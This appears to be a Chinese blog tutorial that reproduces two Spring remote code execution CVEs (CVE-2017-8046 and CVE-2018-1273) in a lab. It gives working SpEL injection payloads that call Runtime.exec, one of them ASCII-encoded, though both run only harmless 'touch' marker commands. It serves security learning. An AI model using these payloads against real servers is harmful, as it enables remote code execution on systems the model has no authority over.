常见框架漏洞--Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

环境搭建

漏洞利用

1. 访问 http://your-ip:8080/customers/1

2.然后抓取数据包,使⽤PATCH请求来修改

{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }


其中 new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看是否上传成功

spring 代码执⾏ (CVE-2018-1273)

搭建环境后访问

访问users

填写注册信息,抓包

在username后加
username#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")=&password=&repeatedPassword=

进入终端查看

相关推荐
xixixi777772 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_466525292 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz567892 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_954708313 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
冰茶丿4 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
长风2306 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全
云水一下6 小时前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
技术不好的崎鸣同学7 小时前
Windows 命令提示符(CMD)恶意脚本分析篇
网络·windows·安全·系统安全
Sagittarius_A*8 小时前
Docker:渗透前置容器化核心基础
运维·安全·docker·容器
孟郎郎8 小时前
AI 辅助开发编程敏感信息保护安全规范
人工智能·安全·ai·风险·隐患